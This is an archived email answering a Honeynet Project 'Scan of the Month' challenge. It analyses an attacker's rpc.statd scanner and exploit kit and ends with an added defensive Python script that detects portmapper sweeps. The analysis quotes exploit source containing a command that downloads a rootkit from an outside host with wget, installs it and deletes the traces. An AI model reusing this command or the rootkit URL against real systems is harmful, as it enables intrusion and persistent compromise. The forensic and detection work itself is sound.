From yoann.lecorvic@infrasoft-civil.com Sat Mar 17 20:01:40 2001
Date: Mon, 05 Mar 2001 13:12:14 +0000
From: Yoann LeCorvic
To: project@honeynet.org
Subject: Scan of the month

Hello,

I did it very quickly this time... Sorry for any obvious errors...

==== What is the blackhat attempting to do with his command line syntax?

He created a hidden directory and downloaded his tool LUCKROOT there. Then he tried to run it.

==== What does the tool accomplish?
==== How does the tool work?

It scans a specified range of IP addresses for the rpc.statd server, and tries to exploit it. It tries to make a socket connection to port 111 on all the machines specified in the ./luckgo parameters, and if a connection is successful it launches the luckstatdx exploit, which creates a shell and runs a ROOTKIT INSTALL: http://www.becys.org/xzibit.tar.gz which I haven't looked at...

==== Is this tool a worm, or would you classify it as something else?

It's not a worm... It doesn't do anything on its own. I would classify it as a "scanning tool that tries to exploit a vulnerability" ;-)

==== Is this tool original, or is it simply based on previous tools?

It is based on an existing tool.

    // Becys was modify herre some cmd.
    fmax = max(fileno(stdin), sockd) + 1;
    send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);

AND

    fprintf(stderr, "statdx modify by becys \n");
    fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);

==== If based on previous tools, which ones and what is modified?

The original statdx or rpc.statd exploit code was modified. Combined with this scanning tool to try and exploit several machines in one LUCKgo.
Cheers

Yoann Le Corvic - Internet Administrator
Email : yoann.lecorvic@infrasoft-civil.com
Web : http://www.infrasoft-civil.com/
========================
Infrasoft Ltd
North Heath Lane
Horsham, West Sussex
RH12 5QE
United Kingdom
Tel : +44 (0)1403 259511
Fax : +44 (0)1403 217728

**********************************************************************
The information contained in this message or any of its attachments is confidential and is intended for the exclusive use of the addressee. The information may also be legally privileged. The views expressed may not be those of Infrasoft, but the personal views of the originator. If you are not the addressee, any disclosure, reproduction, distribution or other dissemination or use of this communication is strictly prohibited. If you have received this message in error, please contact : postmaster@infrasoft-civil.com and delete this message.
**********************************************************************
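The submission above describes luckgo's behaviour from the attacker's side: one source connects to port 111 on every host in a range and fires the statd exploit wherever the connection succeeds. The following is an added, defender-side example and is not part of Yoann's submission or of any Honeynet Project material. It assumes a constructed connection-log format ("epoch src dst dport ACTION", invented for this example) and shows how to flag a single source sweeping tcp/111 across many hosts, then list the hosts that actually accepted the connection, which are the ones to check first for a compromise.

```python
"""Detect a portmapper (tcp/111) sweep in connection logs.

Added example, not part of the original Scan of the Month submission.
The log format is constructed for this example: one line per
connection attempt, "<epoch> <src_ip> <dst_ip> <dst_port> <ACTION>".
A scanner like the one analysed above touches tcp/111 on many
distinct destinations from one source in a short window; that is
the pattern flagged here.
"""
from collections import defaultdict

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
985000000 10.1.1.50 10.2.0.1 111 DENY
985000001 10.1.1.50 10.2.0.2 111 DENY
985000001 10.1.1.50 10.2.0.3 111 ALLOW
985000002 10.1.1.50 10.2.0.4 111 DENY
985000002 10.1.1.50 10.2.0.5 111 DENY
985000003 10.1.1.50 10.2.0.6 111 DENY
985000010 10.1.1.7 10.2.0.3 111 ALLOW
985000011 10.1.1.7 10.2.0.3 22 ALLOW
985000012 10.1.1.8 10.2.0.9 80 ALLOW
"""


def parse_line(line):
    """Parse one constructed log line into (ts, src, dst, dport, action)."""
    ts, src, dst, dport, action = line.split()
    return int(ts), src, dst, int(dport), action


def find_sweeps(log_text, port=111, min_hosts=5, window=60):
    """Return {src: sorted list of all destinations it touched on `port`}
    for every source that reached at least `min_hosts` distinct
    destinations on that port within some `window`-second span."""
    events = defaultdict(list)  # src -> [(ts, dst)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, _ = parse_line(line)
        if dport == port:
            events[src].append((ts, dst))

    hits = {}
    for src, evs in events.items():
        evs.sort()  # by timestamp
        lo = 0
        for hi in range(len(evs)):
            # Slide the window start forward until it spans <= `window` s.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            distinct = {d for _, d in evs[lo:hi + 1]}
            if len(distinct) >= min_hosts:
                hits[src] = sorted({d for _, d in evs})
                break
    return hits


def exposed_targets(log_text, sweeps, port=111):
    """For each sweeping source, the destinations where the connection to
    `port` was ALLOWed: those hosts could have received the exploit and
    should be triaged first (running statd, rootkit artefacts, etc.)."""
    exposed = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, src, dst, dport, action = parse_line(line)
        if src in sweeps and dport == port and action == "ALLOW":
            exposed[src].add(dst)
    return {s: sorted(d) for s, d in exposed.items()}


if __name__ == "__main__":
    sweeps = find_sweeps(SAMPLE_LOG)
    for src, dsts in sweeps.items():
        print(f"sweep from {src}: {len(dsts)} hosts on tcp/111")
    for src, dsts in exposed_targets(SAMPLE_LOG, sweeps).items():
        print(f"  accepted connections from {src}: {', '.join(dsts)}")
```

The thresholds (`min_hosts`, `window`) are deliberately parameters: a legitimate monitoring host may poll the portmapper on a few machines, but one source reaching five or more distinct hosts on tcp/111 within a minute is the scanning footprint of a tool like luckgo rather than normal NFS or NIS traffic.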